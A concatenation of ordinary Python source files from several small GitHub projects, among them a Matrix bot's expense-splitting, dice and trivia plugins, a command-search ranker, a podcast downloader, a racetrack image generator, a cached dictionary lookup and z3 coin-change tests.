elif len(new_percentages) == 0 and len(new_names) > 1:
# no name got a percentage value
new_group_even = GroupPayments(splits_evenly=True)
for name in new_names:
# create a new group member without split percentage (split expenses equally)
new_group_even.append_new_member(name)
# persist new group for current room id
await pg.save_group(command.room.room_id, new_group_even)
else:
# sth went terribly wrong
await plugin.respond_notice(command, response_input_error)
return
else:
# no command args defined
await plugin.respond_notice(command, response_input_error)
return
response_success = "Successfully registered a new group:"
await plugin.respond_message(command, response_success)
await print_room_state(command)
async def print_room_state(command):
"""Read the database for the group registered for the current room [debugging helper function]"""
loaded_group: GroupPayments = await pg.load_group(command.room.room_id)
response = "No group registered for this room!"
if loaded_group is not None:
response = loaded_group.__str__()
await plugin.respond_message(command, response)
else:
await plugin.respond_message(command, "No data to read!")
async def add_expense_for_user(command):
"""Adds a new expense for the given username"""
response_input_error = (
"You need to provide a previously registered user-name and expense value: \n" "`cashup-add-expense <user-name> <expense-value>[€/$] [optional]`"
)
match_expense_nr: Match
user_name: str = ""
if len(command.args) == 1:
match_expense_nr = re.search("\d*[.,]?\d+", command.args[0])
if match_expense_nr:
            # user seems to have an expense number defined
# maybe the user wants to increase for himself
# check if display_name of user is registered in the group
mxid: str = command.event.sender
user_name = command.room.user_name(mxid)
# user_link: str = await plugin.link_user(command.client, command.room.room_id, display_name)
# await plugin.respond_message(command, f"Command received from {display_name} ({mxid}). Userlink: {user_link}")
elif len(command.args) == 2:
# first command arg is <user-name>
user_name = command.args[0]
# second command arg is <expense-value>
# clean up expense-value from additional currency signs etc
# find any number in string (eg: 12; 12,1; 12.1)
match_expense_nr = re.search("\d*[.,]?\d+", command.args[1])
else:
# command should only contain <user-name> and <expense-value>
await plugin.respond_notice(command, response_input_error)
return
if match_expense_nr:
# extract match, then replace "," of german numbers by a "." decimal point
expense_float = float(match_expense_nr.group().replace(",", "."))
try:
# Persistent_groups.load_group throws AttributeError when group not found
loaded_group: GroupPayments = await pg.load_group(command.room.room_id)
# Group.increase_expense throws IndexError when user_name not found
loaded_group.increase_expense(user_name, expense_float)
except (AttributeError, IndexError) as e:
await plugin.respond_notice(command, response_input_error)
return
await pg.save_group(command.room.room_id, loaded_group)
await plugin.respond_message(
command,
f"Successfully added {clean_print_currency(expense_float)} expense for {user_name}!",
)
else:
await plugin.respond_notice(command, response_input_error)
async def cash_up(command):
"""Settle all registered expenses among the previously registered group."""
try:
loaded_group: GroupPayments = await pg.load_group(command.room.room_id)
except AttributeError:
response_error = "No cashup possible because there was no group registered for this room."
await plugin.respond_notice(command, response_error)
return
cash_up = Cashup(loaded_group)
message: str = ""
who_owes_who_texts = cash_up.distribute_expenses()
# check if any payments should be done
if len(who_owes_who_texts) > 0:
message += f"**Result of group cashup**: \n"
for line in who_owes_who_texts:
message += f"{line} \n"
await plugin.respond_message(command, message)
else:
await plugin.respond_notice(command, "No balancing of expenses needed.")
loaded_group.reset_all_expenses()
await pg.save_group(command.room.room_id, loaded_group)
setup()
```
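A brief sketch of how the `GroupPayments` and `Cashup` classes above fit together. The member names and amounts are made up, and running it still requires the plugin's `currency_sign` config because the output strings go through `clean_print_currency`.

```python
# Usage sketch (hypothetical data; assumes the classes above are in scope).
group = GroupPayments(splits_evenly=True)
for name in ("alice", "bob", "carol"):
    group.append_new_member(name)
group.increase_expense("alice", 60.0)
group.increase_expense("bob", 30.0)
for line in Cashup(group).distribute_expenses():
    print(line)  # e.g. "carol owes alice 30.00€"
```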
#### File: plugins/echo/echo.py
```python
from core.plugin import Plugin
plugin = Plugin("echo", "General", "A very simple Echo plugin")
def setup():
plugin.add_command("echo", echo, "make someone agree with you for once")
async def echo(command):
"""Echo back the command's arguments"""
response = " ".join(command.args)
await plugin.respond_message(command, response)
setup()
```
#### File: plugins/roll/roll.py
```python
__description__ = "Roll one or more dice. The trigger is 'roll'."
__version__ = "1.1"
__author__ = "Dingo"
from core.plugin import Plugin
import random
async def roll(command):
if not command.args:
await plugin.respond_notice(command, "No argument given.")
return None
try:
number, rest = command.args[0].lower().split("d", 1)
if number.strip() == "":
number = 1
else:
number = abs(int(number.strip()))
if rest.strip().startswith("0"):
lowest_value = 0
else:
lowest_value = 1
if "+" in rest:
sides, modifier = rest.split("+", 1)
if sides.strip() == "":
sides = 6
else:
sides = abs(int(sides.strip()))
modifier = int(modifier.strip())
elif "-" in rest:
sides, modifier = rest.split("-", 1)
if sides.strip() == "":
sides = 6
else:
sides = abs(int(sides.strip()))
modifier = -int(modifier.strip())
else:
if rest.strip() == "":
sides = 6
else:
sides = abs(int(rest.strip()))
modifier = 0
except ValueError:
await plugin.respond_notice(command, "Malformed argument! Use 1d6, 3d10 etc.")
return None
if number == 0 or sides == 0:
await plugin.respond_notice(
command,
"Number of dice or sides per die are zero! Please use only nonzero numbers.",
)
return None
random.seed()
roll_list = []
if number > 100000:
await plugin.respond_notice(
command,
"Number of dice too large! Try a more reasonable number. (5 digits are fine)",
)
return None
for _ in range(number):
roll_list.append(random.randint(lowest_value, sides))
if len(roll_list) > 50:
result_list = " <detailed list too large>"
else:
result_list = " (" + " + ".join([str(x) for x in roll_list]) + ")"
if len(result_list) > 200:
result_list = " <detailed list too large>"
if len(roll_list) == 1:
result_list = ""
await plugin.respond_message(
command,
"**Result:** " + str(sum(roll_list) + modifier) + result_list,
delay=200,
)
plugin = Plugin("roll", "General", "Plugin to provide a simple, randomized !roll of dice")
plugin.add_command("roll", roll, "the dice giveth and the dice taketh away")
```
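The plugin above parses dice notation such as `3d10+2` by hand. A small standalone sketch of the same idea, without the bot plumbing, is shown below; the helper name and the simplified regex-based parsing are assumptions, not the plugin's exact behavior.

```python
import random
import re

def parse_and_roll(spec: str) -> int:
    """Roll dice for a spec like '3d6', 'd20' or '2d10+4' (illustrative only)."""
    m = re.fullmatch(r"(\d*)d(\d*)([+-]\d+)?", spec.strip().lower())
    if not m:
        raise ValueError("Malformed argument! Use 1d6, 3d10 etc.")
    number = int(m.group(1) or 1)
    sides = int(m.group(2) or 6)
    modifier = int(m.group(3) or 0)
    return sum(random.randint(1, sides) for _ in range(number)) + modifier

print(parse_and_roll("3d6+2"))
```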
#### File: plugins/wissen/wissen.py
```python
import logging
import random
import os.path
from core.bot_commands import Command
from core.plugin import Plugin
logger = logging.getLogger(__name__)
plugin = Plugin("wissen", "Fun", "Post a random or specific entry of the database of useless knowledge.")
def setup():
"""
This just moves the initial setup-commands to the top for better readability
:return: -
"""
plugin.add_command("wissen", wissen, "Post a random or specific entry of the database of useless knowledge.")
async def wissen(command: Command):
"""
Post a random or specific entry of the database of useless knowledge
:param command:
:return:
"""
with open(os.path.join(os.path.dirname(__file__), "wissen.txt")) as wissendb:
wissen = wissendb.readlines()
wissenanzahl = len(wissen)
if len(command.args) == 1 and str(command.args[0]).isdigit():
handle: int = command.args[0]
elif len(command.args) == 0:
handle: int = 0
else:
await plugin.respond_notice(command, "Usage: `wissen [index]`")
return
try:
wissenindex = int(handle)
if wissenindex < 1 or wissenindex > wissenanzahl:
raise IndexError
chosen = wissen[wissenindex - 1]
except (ValueError, IndexError):
chosen = random.choice(wissen)
wissenindex = wissen.index(chosen) + 1
ausgabe = "%s (%s/%s)" % (chosen.strip(), wissenindex, wissenanzahl)
await plugin.respond_notice(command, ausgabe)
setup()
``` |
{
"source": "jimmyppi/searchcmd",
"score": 3
} |
#### File: searchcmd/searchcmd/commands.py
```python
from operator import itemgetter
from collections import Counter
from pygments import highlight
from pygments.lexers import BashLexer
from pygments.formatters import TerminalFormatter
LEXER = BashLexer()
FORMATTER = TerminalFormatter()
class Command(object):
def __init__(self, cmd, line, idx, doc):
self.cmd = cmd
self.name = cmd.split()[0]
self.lines = [line]
self.idxs = [idx]
self.docs = [doc]
self.domains = Counter({doc.url.domain: 1})
def to_dict(self):
return {'cmd': self.cmd,
'lines': self.lines,
'idxs': self.idxs,
'docs': self.docs}
@classmethod
def from_dict(cls, d):
cmd = d['cmd']
merged = None
for line, idx, doc in zip(d['lines'], d['idxs'], d['docs']):
inst = cls(cmd, line, idx, doc)
if merged is None:
merged = inst
else:
merged.add_duplicate(inst)
return merged
def __eq__(self, cmd):
# TODO: More advanced comparison
return self.cmd == cmd.cmd
def add_duplicate(self, cmd):
self.lines.extend(cmd.lines)
self.idxs.extend(cmd.idxs)
self.docs.extend(cmd.docs)
self.domains.update(cmd.domains)
def echo(self, verbose=False):
"""
Example output:
cmd --flag (fromdomain.com, otherdomain.com)
Include urls to all sources if verbose:
cmd --flag (fromdomain.com)
http://fromdomain.com/full/path
...
"""
cmd = highlight(self.cmd, LEXER, FORMATTER).strip()
domains = u'({})'.format(
u', '.join(d for d,_ in self.domains.most_common(2)))
s = u'{}\t{}'.format(cmd, domains)
if verbose:
s += u'\n {}'.format(
u'\n'.join([u'\t{}'.format(doc.url.url) for doc in self.docs]))
return s
def score(self, nr_docs):
nr_docs = float(nr_docs)
score = 0.0
for line, doc in zip(self.lines, self.docs):
score += (doc.nr_lines/(doc.nr_lines + line)) * \
(nr_docs/(nr_docs + doc.idx))
return score
def __repr__(self):
return '<cmd {}>'.format(self.cmd.encode('utf-8'))
class Commands(object):
def __init__(self, commands=None, nr_docs=0):
self.commands = commands or {}
self.nr_docs = nr_docs
def add_command(self, cmd):
if cmd.cmd in self.commands:
self.commands[cmd.cmd].add_duplicate(cmd)
else:
self.commands[cmd.cmd] = cmd
def rank_commands(self, nr=5):
cmds = [(cmd.score(self.nr_docs), cmd)
for cmd in self]
cmds.sort(key=itemgetter(0), reverse=True)
return [cmd for _, cmd in cmds[:nr]]
def __iter__(self):
for command in self.commands.values():
yield command
def to_dict(self):
return {'commands': self.commands,
'nr_docs': self.nr_docs}
@classmethod
def from_dict(cls, d):
return cls(d['commands'], d['nr_docs'])
```
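A toy illustration of the ranking formula used by `Command.score` above: occurrences near the top of pages that rank early in the search results contribute more. The document stub and numbers below are invented.

```python
# Toy score computation mirroring Command.score (doc stats are made up).
class FakeDoc:
    def __init__(self, nr_lines, idx):
        self.nr_lines = float(nr_lines)   # number of lines in the source page
        self.idx = idx                    # rank of the page in the search result

def score(lines, docs, nr_docs):
    nr_docs = float(nr_docs)
    return sum(
        (doc.nr_lines / (doc.nr_lines + line)) * (nr_docs / (nr_docs + doc.idx))
        for line, doc in zip(lines, docs)
    )

print(score([3, 40], [FakeDoc(200, 0), FakeDoc(200, 4)], nr_docs=5))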
#### File: searchcmd/searchcmd/download.py
```python
import re
import sys
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from concurrent.futures import as_completed
from requests.packages import urllib3
from requests_futures.sessions import FuturesSession
from lxml.html import fromstring, tostring
try:
from lxml.html import soupparser
except ImportError:
soupparser = None
import tld
urllib3.disable_warnings()
def get(request):
session = FuturesSession(max_workers=1)
future = next(as_completed([session.get(
request.url, headers=request.headers, timeout=request.timeout)]))
if future.exception() is not None:
return DownloadError(request, future.exception())
else:
resp = future.result()
return HtmlDocument(resp.url, resp.content)
def iter_get(requests, verbose=True):
if isinstance(requests, Request):
requests = [requests]
session = FuturesSession(max_workers=10)
futures_to_req = dict(
(session.get(req.url, headers=req.headers, timeout=req.timeout),
(req, i)) for i, req in enumerate(requests))
for future in as_completed(futures_to_req):
if future.exception() is not None:
req, idx = futures_to_req[future]
if verbose:
sys.stdout.writelines(u'x')
sys.stdout.flush()
yield DownloadError(req, future.exception(), idx)
else:
resp = future.result()
_, idx = futures_to_req[future]
if verbose:
sys.stdout.writelines(u'.')
sys.stdout.flush()
yield HtmlDocument(resp.url, resp.content, idx)
if verbose:
sys.stdout.writelines(u'\n')
class DownloadError(object):
def __init__(self, request, err, idx=None):
self.request = request
self.idx = idx
self.err = err
self.status_code = None
if hasattr(err, 'status_code'):
self.status_code = err.status_code
class Request(object):
def __init__(self, url, headers=None, timeout=None):
self.url = url
self.headers = headers
self.timeout = timeout or 3.03
class HtmlDocument(object):
def __init__(self, url, body, idx=None, nr_lines=None):
self.url = Url(url)
self.body = body
self.nr_lines = nr_lines
if self.nr_lines is None:
self.nr_lines = float(len(body.split(b'\n')))
self.idx = idx
self._tree = None
@property
def tree(self):
if self._tree is not None:
return self._tree
try:
self._tree = fromstring(self.body, base_url=self.url.url)
_ = tostring(self._tree, encoding='unicode')
except:
try:
self._tree = soupparser.fromstring(self.body)
except:
pass
return self._tree
def to_dict(self):
return {'url': self.url.url,
'nr_lines': self.nr_lines,
'idx': self.idx}
@classmethod
def from_dict(cls, d):
return cls(d['url'], b'', d['idx'], d['nr_lines'])
class Url(object):
def __init__(self, url):
self.url = url
self.domain = re.sub('^www.', '', urlparse(self.url).netloc)
self.base_domain = tld.get_tld(self.url)
``` |
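The non-blocking download helpers above are built on requests-futures. A reduced sketch of the same pattern (fire off several requests and handle them as they complete) is shown below; the URLs are placeholders.

```python
from concurrent.futures import as_completed
from requests_futures.sessions import FuturesSession

urls = ["https://example.com", "https://example.org"]   # placeholder URLs
session = FuturesSession(max_workers=10)
futures = {session.get(url, timeout=3.03): url for url in urls}
for future in as_completed(futures):
    url = futures[future]
    if future.exception() is not None:
        print("x", url, future.exception())
    else:
        print(".", url, future.result().status_code)
```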
{
"source": "jimmy-print/DynamicJRE",
"score": 3
} |
#### File: DynamicJRE/dynamicjre/get_episode.py
```python
import os
import requests
from bs4 import BeautifulSoup
REGULAR = "regular"
MMA = "mma"
FIGHT = "fight"
episode_types = (REGULAR, MMA, FIGHT)
url_formats = (
"http://traffic.libsyn.com/joeroganexp/p{}.mp3",
"http://traffic.libsyn.com/joeroganexp/mmashow{}.mp3",
)
# Fight episodes aren't supported yet
alt_regular_url_format = "http://traffic.libsyn.com/joeroganexp/p{}a.mp3"
# Sometimes the url for regular episodes has an 'a' after the
# url number. I have no idea why.
episode_type_url_format = dict(zip(episode_types, url_formats))
def download(episode_number, episode_type, guest, headers=None):
"""Calls requests.get to do the actual downloading"""
try:
print(f"Downloading episode {episode_type} {episode_number} {guest}")
download_link = (
episode_type_url_format[episode_type].format(episode_number))
raw_episode = requests.get(download_link, headers=headers)
if not raw_episode.ok:
download_link = alt_regular_url_format.format(episode_number)
print("Trying alternative url format...")
raw_episode = requests.get(download_link, headers=headers)
# If the response is the 404 html
if raw_episode.headers['content-type'] == 'text/html; charset=UTF-8':
print('Episode {} was not found.'.format(episode_number))
except KeyboardInterrupt:
return
# Use context manager here?
try:
with open(f"p{episode_number}.mp3", "wb") as f:
print("Writing to mp3")
f.write(raw_episode.content)
except KeyboardInterrupt:
cleanup(episode_number)
def with_episode_number(episode_number, headers=None):
"""Downloads the specified regular episode"""
# guest is an empty string because I haven't implemented searching
# with ep. numbers
download(episode_number, REGULAR, guest="", headers=headers)
def get_latest_episode_attributes():
"""Returns latest episode number and type (Regular, MMA, Fight)"""
homepage = "http://podcasts.joerogan.net/"
response = requests.get(homepage)
soup = BeautifulSoup(response.text, "lxml")
latest_element = soup.find_all("div", attrs={"class": "episode odd"})[0]
episode_number_element = latest_element.find("span", attrs={"class": "episode-num"})
episode_number = episode_number_element.text.strip("#")
title_element = latest_element.find("a", attrs={"class": "ajax-permalink"})
title_text = title_element.get("data-title")
if "mma show" in title_text.lower():
episode_type = MMA
elif "fight companion" in title_text.lower():
episode_type = FIGHT
else:
episode_type = REGULAR
guest = latest_element.find("a", attrs={"data-section": "podcasts"}).get("data-title")
return episode_number, episode_type, guest
def latest(headers=None):
"""Downloads the latest episode"""
try:
episode_number, episode_type, guest = get_latest_episode_attributes()
except KeyboardInterrupt:
return
download(episode_number, episode_type, guest, headers=headers)
return episode_number, episode_type, guest # For testing purposes
def cleanup(episode_number):
"""Deletes the downloaded episode"""
print("Commencing cleanup")
os.remove(f"p{episode_number}.mp3")
print("Cleanup complete. Exiting.")
```
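For reference, a hedged sketch of combining the libsyn URL format above with a `Range` header to fetch only the first bytes of an episode, which is the pattern the tests below rely on. The episode number is arbitrary.

```python
import requests

episode_number = 1000  # arbitrary example
url = "http://traffic.libsyn.com/joeroganexp/p{}.mp3".format(episode_number)
resp = requests.get(url, headers={"Range": "bytes=0-100"})
print(resp.status_code, resp.headers.get("content-type"))
```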
#### File: DynamicJRE/tests/test_get_episode.py
```python
import unittest
import os
from dynamicjre import get_episode
headers = {
"Range": "bytes=0-100"
}
number = 1000
def make_test_request(self):
get_episode.download(
number, get_episode.REGULAR, "",
headers=headers)
class TestSaveFolder(unittest.TestCase):
def tearDown(self):
get_episode.cleanup(number)
def test_save_folder(self):
make_test_request(self)
self.assertTrue(os.path.isfile(f"p{number}.mp3"))
class TestNoSaveFolder(unittest.TestCase):
def tearDown(self):
get_episode.cleanup(number)
def test_no_save_folder(self):
make_test_request(self)
self.assertTrue(os.path.isfile(f"p{number}.mp3"))
class TestCleanup(unittest.TestCase):
def test_cleanup(self):
make_test_request(self)
get_episode.cleanup(number)
self.assertFalse(os.path.isfile(f"/p{number}.mp3"))
class TestGetLatestEp(unittest.TestCase):
def test_get_latest_ep_attrs(self):
episode_num, episode_type, __ = get_episode.get_latest_episode_attributes()
int(episode_num)
self.assertTrue(episode_type, get_episode.episode_types)
def test_get_latest_ep(self):
episode_num_alt, __, __ = get_episode.latest(headers=headers)
get_episode.cleanup(episode_num_alt)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jimmyprior/RaceCar",
"score": 3
} |
#### File: jimmyprior/RaceCar/race.py
```python
import math
import random
from PIL import Image, ImageDraw, ImageFont
circumference = 1250
radius = circumference / (2 * math.pi)
diameter = radius * 2
im_width = int(diameter * 2.2)
im_height = int(diameter * 2.2)
im_center_x = im_width / 2
im_center_y = im_height / 2
track_center_x = im_width / 2
track_center_y = im_height / 2
tank_color = (255, 0, 0) #tank and gas number g%
track_color = (0, 0, 255) #dist and track d%
def get_random_percents(number):
"""
    returns a list of n random percents that will sum to 100
"""
tanks = []
total = 0
for _ in range(number):
num = random.randint(1, 10)
total += num
tanks.append(num)
percents = []
for tank in tanks:
percents.append(math.floor(100 * tank / total))
dif = 100 - sum(percents)
if dif != 0:
percents[random.randint(0, len(percents)-1)] += dif
return percents
def get_points(theta, hypotenuse):
x = math.cos(theta) * hypotenuse
y = math.sin(theta) * hypotenuse
return (x, y)
def draw_gas_can(img, center_x, center_y, radius):
img.ellipse(
[(center_x - radius, center_y - radius),
(center_x + radius, center_y + radius)],
fill=(255, 0, 0)
)
def generate_track(qty_tanks):
"""
    qty_tanks : the number of tanks to be put randomly on the track
"""
image = Image.new("RGB", (im_width, im_height), (255, 255, 255))
draw = ImageDraw.Draw(image, "RGB")
draw.ellipse(
[(im_center_x - radius, im_center_y - radius), (im_center_x + radius, im_center_y + radius)],
outline = (0, 0, 0),
width = 6
)
distances = get_random_percents(qty_tanks)
gas_amounts = get_random_percents(qty_tanks)
circ = 0
font = ImageFont.truetype("arial.ttf", 30)
for index, dist, gas in zip(range(1, qty_tanks+1), distances, gas_amounts):
#hypotenuse = radius
index = qty_tanks - index
gas_angle = ((circ + dist) / 100) * (2 * math.pi)
gas_x, gas_y = get_points(gas_angle, radius)
gas_label_x, gas_label_y = get_points(gas_angle, radius + 50)
dist_angle = ((circ + dist / 2) / 100) * (2 * math.pi)
dist_x, dist_y = get_points(dist_angle, radius)
dist_label_x, dist_label_y = get_points(dist_angle, radius + 100)
draw_gas_can(draw, gas_x + track_center_x, gas_y + track_center_y, 6)
gas_label = [gas_label_x + track_center_x, gas_label_y + track_center_y]
gas_tank = (gas_x + track_center_x, gas_y + track_center_y)
draw.line([gas_tank, tuple(gas_label)], fill=tank_color) #draw the tank line
dist_label = [dist_label_x + track_center_x, dist_label_y + track_center_y]
dist_start = (dist_x + track_center_x, dist_y + track_center_y)
draw.line([dist_start, tuple(dist_label)], fill=track_color) #draw the dist line
circ += dist
if gas_label[0] < track_center_x:
gas_label[0] -= font.getsize(f"g{index}={gas}%")[0]
if dist_label[0] < track_center_x:
dist_label[0] -= font.getsize(f"g{index}={dist}%")[0]
draw.text(tuple(gas_label), f"g{index}={gas}%", fill=(100, 0, 0), font=font) #draw gas percentage
draw.text(tuple(dist_label), f"d{index}={dist}%", fill=(0, 0, 100), font=font) #previous circ + dist / 2
return image
largest = 12
smallest = 2
#generate_track(5).show()
for i in range(10):
generate_track(random.randint(smallest, largest)).save(f"tracks/track-{i}.png")
``` |
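A quick check of the invariant `get_random_percents` is built around (the returned percentages always sum to exactly 100, because the rounding difference is added back to one element). Illustrative only; it assumes the function above is in scope.

```python
# Sanity check for get_random_percents: every draw sums to exactly 100.
for n in range(2, 13):
    percents = get_random_percents(n)
    assert sum(percents) == 100, (n, percents)
print("all splits sum to 100")
```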
{
"source": "jimmyqtran/IntermediateSoftwareDesignPython",
"score": 3
} |
#### File: IntermediateSoftwareDesignPython/Project 8 - Local Dictionary/LocalDictionary.py
```python
from datalist import *
from enum import Enum
import json
class DictionaryEntry:
def __init__(self, word, part_of_speech, definition, example=None):
self.word = word
self.part_of_speech = part_of_speech
self.definition = definition
self.example = example
def __str__(self):
return f"Word : {self.word} \n" \
f"Part of speech: {self.part_of_speech} \n" \
f"Definition : {self.definition} \n" \
f"Example : {self.example}"
class LocalDictionary:
def __init__(self, dictionary_json_name="dictionary.json"):
self.dictionary = {}
filename = dictionary_json_name
with open(filename) as json_file:
data = json.load(json_file, object_hook=self.my_decoder)
for entry in data:
self.dictionary[entry.word] = entry
@staticmethod
def my_decoder(thingy):
if "entries" in thingy:
mega_list = []
d = thingy["entries"]
for entry in d:
a = DictionaryEntry(entry["word"], entry["part_of_speech"], entry["definition"])
if "example" in entry:
a.example = entry["example"]
mega_list.append(a)
return mega_list
return thingy
def search(self, word):
if word not in self.dictionary:
raise KeyError("The word is not in the dictionary.")
return self.dictionary[word]
    def __str__(self):
        return "\n\n".join(str(entry) for entry in self.dictionary.values())
class DictionaryEntryCache(DataList):
def __init__(self, capacity=10):
super().__init__()
if capacity < 1:
raise ValueError("There must be at least a capacity of one")
self.capacity = capacity
def add(self, entry):
if not isinstance(entry, DictionaryEntry):
raise TypeError("The entry should be of type Dictionary Entry")
count = 0
self.reset_current()
while self.current is not None:
self.iterate()
count += 1
self.reset_current()
if count >= self.capacity:
for _ in range(self.capacity - 1):
self.iterate()
self.current.next = None
self.add_to_head(entry)
def search(self, word):
self.reset_current()
while True:
node = self.iterate()
if not node:
raise KeyError("Word not in here")
elif node.data.word == word:
temp = node.data
self.remove(node.data)
self.add(temp)
self.reset_current()
return self.head.next
class DictionarySource(Enum):
LOCAL = 0
CACHE = 1
class Dictionary:
def __init__(self):
self.local = LocalDictionary()
self.cache = DictionaryEntryCache()
def search(self, word):
try:
return self.cache.search(word), DictionarySource.CACHE
except:
if word not in self.local.dictionary:
raise KeyError("Word is not in here")
self.cache.add(self.local.dictionary[word])
return self.local.search(word), DictionarySource.LOCAL
if __name__ == '__main__':
big_dict = Dictionary()
while True:
try:
wordy = input("Enter a word to lookup: ")
actual_entry = big_dict.search(wordy)
print(actual_entry[0])
print(f"(Found in {actual_entry[1].name})")
except KeyError as e:
print(f"{e}: {wordy}")
continue
```
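The decoder above expects a `dictionary.json` file shaped roughly as follows. The field names come from the code; the concrete entries and the file name used here are invented for illustration.

```python
import json

sample = {
    "entries": [
        {"word": "fly", "part_of_speech": "verb",
         "definition": "move through the air", "example": "birds fly"},
        {"word": "python", "part_of_speech": "noun",
         "definition": "a large snake"},
    ]
}
with open("sample_dictionary.json", "w") as f:
    json.dump(sample, f)
local = LocalDictionary("sample_dictionary.json")
print(local.search("fly").part_of_speech)   # verb
```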
#### File: IntermediateSoftwareDesignPython/Project 8 - Local Dictionary/LocalDictionaryUnitTest.py
```python
import itertools
import json
import unittest
from LocalDictionary import *
class DictionaryEntryTestCase(unittest.TestCase):
pass
class LocalDictionaryTestCase(unittest.TestCase):
def testLocalDictionary(self):
local_dict = LocalDictionary()
self.assertIsInstance(local_dict, LocalDictionary)
def testSearch(self):
local_dict = LocalDictionary()
self.assertIsInstance(local_dict.search("fly"), DictionaryEntry)
self.assertEqual(local_dict.search("fly").word, "fly")
self.assertEqual(local_dict.search("fly").part_of_speech, "verb")
self.assertEqual(local_dict.search("python").word, "python")
self.assertEqual(local_dict.search("python").example, None)
self.assertEqual(local_dict.search("jolly").definition, "full of high spirits")
self.assertRaises(KeyError, lambda: local_dict.search("potato"))
class DictionaryEntryCacheTestCase(unittest.TestCase):
def testAdd(self):
local_dict = LocalDictionary()
#instantiate a DictionaryEntryCache of capacity 3
cache = DictionaryEntryCache(capacity=3)
cache.add(local_dict.search("fly"))
self.assertEqual(cache.head.next.data.word, "fly")
self.assertEqual(cache.head.next.next, None)
cache.add(local_dict.search("foothill"))
self.assertEqual(cache.head.next.data.word, "foothill")
self.assertEqual(cache.head.next.next.data.word, "fly")
self.assertEqual(cache.head.next.next.next, None)
cache.add(local_dict.search("python"))
self.assertEqual(cache.head.next.data.word, "python")
self.assertEqual(cache.head.next.next.data.word, "foothill")
self.assertEqual(cache.head.next.next.next.data.word, "fly")
self.assertEqual(cache.head.next.next.next.next, None)
cache.add(local_dict.search("jolly"))
self.assertEqual(cache.head.next.data.word, "jolly")
self.assertEqual(cache.head.next.next.data.word, "python")
self.assertEqual(cache.head.next.next.next.data.word, "foothill")
self.assertEqual(cache.head.next.next.next.next, None)
def testSearch(self):
# search when the word already exists in the cache
local_dict = LocalDictionary()
cache = DictionaryEntryCache(capacity=3)
cache.add(local_dict.search("python"))
cache.add(local_dict.search("foothill"))
cache.add(local_dict.search("jolly"))
cache.search("foothill")
self.assertEqual(cache.head.next.data.word, "foothill")
self.assertEqual(cache.head.next.next.data.word, "jolly")
self.assertEqual(cache.head.next.next.next.data.word, "python")
self.assertEqual(cache.head.next.next.next.next, None)
# search when the word does not exist in the cache
self.assertRaises(KeyError, lambda: cache.search("potato"))
# search when the word is already in the cache but it's the only word
cache2 = DictionaryEntryCache(capacity=3)
cache2.add(local_dict.search("foothill"))
cache2.search("foothill")
self.assertEqual(cache2.head.next.data.word, "foothill")
class DictionaryTestCase(unittest.TestCase):
def testDictionary(self):
big_dict = Dictionary()
wow = big_dict.search("foothill")
self.assertEqual(wow[0].word, "foothill")
self.assertEqual(wow[1], DictionarySource.LOCAL)
wow_the_second_coming = big_dict.search("foothill")
self.assertEqual(wow_the_second_coming[0].data.word, "foothill")
self.assertEqual(wow_the_second_coming[1], DictionarySource.CACHE)
``` |
{
"source": "JimmyQuenichet/z3",
"score": 3
} |
#### File: practice/least_change/least_change_test.py
```python
import unittest
from z3 import *
from least_change import (
least_change,
)
# Tests adapted from https://github.com/exercism/python/blob/main/exercises/practice/change/change_test.py
class ChangeTest(unittest.TestCase):
def test_single_coin_change(self):
self.assertEqual(str(least_change([1, 5, 10, 25, 100], 25)), "[10 = 0, 25 = 1, 100 = 0, 5 = 0, min_coins = 1, "
"1 = 0]")
def test_multiple_coin_change(self):
self.assertEqual(str(least_change([1, 5, 10, 25, 100], 15)), "[10 = 1, 25 = 0, 100 = 0, 5 = 1, min_coins = 2, 1 = 0]")
def test_change_with_lilliputian_coins(self):
self.assertEqual(str(least_change([1, 4, 15, 20, 50], 23)), "[15 = 1, 4 = 2, 20 = 0, 50 = 0, min_coins = 3, "
"1 = 0]")
def test_change_with_lower_elbonia_coins(self):
self.assertEqual(str(least_change([1, 5, 10, 21, 25], 63)), "[5 = 0, 21 = 3, 25 = 0, 10 = 0, min_coins = 3, "
"1 = 0]")
def test_large_target_values(self):
self.assertEqual(str(least_change([1, 2, 5, 10, 20, 50, 100], 999)).replace('\n', ''), "[5 = 1, 50 = 1, 100 = "
"9, 2 = 2, 20 = 2, "
"10 = 0, min_coins = "
"15, 1 = 0]")
def test_possible_change_without_unit_coins_available(self):
self.assertEqual(str(least_change([2, 5, 10, 20, 50], 21)), "[10 = 1, 50 = 0, 2 = 3, 20 = 0, 5 = 1, min_coins "
"= 5]")
def test_another_possible_change_without_unit_coins_available(self):
self.assertEqual(str(least_change([4, 5], 27)), "[4 = 3, 5 = 3, min_coins = 6]")
def test_no_coins_make_0_change(self):
self.assertEqual(least_change([1, 5, 10, 21, 25], 0), None)
def test_for_change_smaller_than_the_smallest_of_coins(self):
self.assertEqual(least_change([5, 10], 3), None)
def test_if_no_combination_can_add_up_to_target(self):
self.assertEqual(least_change([5, 10], 94), None)
def test_cannot_find_negative_change_values(self):
self.assertEqual(least_change([1, 2, 5], -5), None)
if __name__ == "__main__":
unittest.main()
``` |
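The `least_change` implementation under test is not included in this excerpt. A plausible sketch using a z3 `Optimize` objective, consistent with the interface the tests exercise (a model on success, `None` otherwise), might look like this; it is an assumption, not the repository's actual code.

```python
from z3 import Int, Optimize, Sum, sat

def least_change(coins, target):
    # No change needed (or impossible) for non-positive targets.
    if target <= 0:
        return None
    opt = Optimize()
    counts = [Int(str(c)) for c in coins]      # one count variable per coin value
    for n in counts:
        opt.add(n >= 0)
    opt.add(Sum([n * c for n, c in zip(counts, coins)]) == target)
    min_coins = Int('min_coins')
    opt.add(min_coins == Sum(counts))
    opt.minimize(min_coins)                    # minimize the total number of coins
    if opt.check() == sat:
        return opt.model()
    return None
```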
{
"source": "jimmyren23/minimax-fair",
"score": 3
} |
#### File: minimax-fair/src/write_params_to_file.py
```python
import os
import boto3
import botocore
def write_params_to_os(dirname, params_list):
# make dir if it doesn't exist
if not os.path.isdir(dirname):
print(f'making directory: {dirname}')
os.makedirs(dirname)
final_path = os.path.join(dirname, 'settings.txt')
with open(final_path, 'w') as f:
for item in params_list:
f.write(f'{item}\n')
def write_params_to_s3(params_list, bucket_name, dirname, ACCESS_KEY, SECRET_KEY):
    # These are None when the credentials file doesn't exist or is set to '';
    # in that case fall back to the default AWS credential chain (e.g. on AWS Batch).
if ACCESS_KEY is not None and SECRET_KEY is not None:
# Authenticate AWS session and create bucket object
try:
session = boto3.Session(
aws_access_key_id=ACCESS_KEY,
aws_secret_access_key=SECRET_KEY,
)
